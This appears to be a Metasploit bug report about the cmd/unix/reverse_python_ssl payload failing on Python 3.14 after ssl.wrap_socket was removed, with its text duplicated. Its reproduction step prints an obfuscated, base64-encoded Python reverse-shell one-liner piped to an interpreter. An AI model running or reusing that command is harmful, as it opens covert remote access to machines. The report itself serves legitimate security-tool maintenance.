Steps to reproduce
Test the cmd/unix/reverse_python_ssl payload with Python 3.14, see it fail
echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNptj81qwzAQhM/WU+hmiaoiNmlxCjqE4kAobUMTn41qbYipahmtnLx+Zez+Ul3EfrMzzLbvvfOBomveIAgcXnvvGkAUDgWiJejUpMnpY/O03tTbp/Ig5nH/fP9Q7w8v5fqRR49sXNdBExhLs1Uus9tCZjcrmeVFKpbx8bikYry8eN3XX8mRVmqjLQK5nFoLtHOxWnVHEqODVig9NGeWLfIlJ0l7pBY6NipcqUVcSrCiih78ACQZz1Df58id6+dlaaBxBlg6hON1kXKBJ7BWjTaBwbgh/PJtd+WIwfv/cNv9pbHZlFKftR1AjZqcSKyvDeP0in7CmDrD6JIInWE/zZx8AGzAi/E\=\'\)\[0\]\)\)\) | $(which python || which python3 || which python2) -
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 4, in <module>
AttributeError: module 'ssl' has no attribute 'wrap_socket'
Expected behavior
It should work. It should also continue to work with all of the same versions it used to.
Current behavior
Right now it crashes, see the stack trace above.
Metasploit version
Latest from git.
Additional Information
It's imperative that the solution continues to work on all of the same version of python that it used to. An acceptable solution will not drop Python 2.7 support. The current module does work with Python 3.4, so the change where ssl.wrap_socket was dropped happend somewhere between 3.4 and 3.14. These types of command payloads aren't typically constrained by size, so increasing it to handle the extra Python versions isn't a major concern.
It's possible that other Python payloads are also affected by this issue where ssl.wrap_socket is invoked and will cause an exception. It would be helpful to investigate the other Python payloads to look for this and fix it as necessary.
Spotted while testing #21255.
Steps to reproduce
Test the
cmd/unix/reverse_python_sslpayload with Python 3.14, see it failExpected behavior
It should work. It should also continue to work with all of the same versions it used to.
Current behavior
Right now it crashes, see the stack trace above.
Metasploit version
Latest from git.
Additional Information
It's imperative that the solution continues to work on all of the same version of python that it used to. An acceptable solution will not drop Python 2.7 support. The current module does work with Python 3.4, so the change where
ssl.wrap_socketwas dropped happend somewhere between 3.4 and 3.14. These types of command payloads aren't typically constrained by size, so increasing it to handle the extra Python versions isn't a major concern.It's possible that other Python payloads are also affected by this issue where
ssl.wrap_socketis invoked and will cause an exception. It would be helpful to investigate the other Python payloads to look for this and fix it as necessary.Spotted while testing #21255.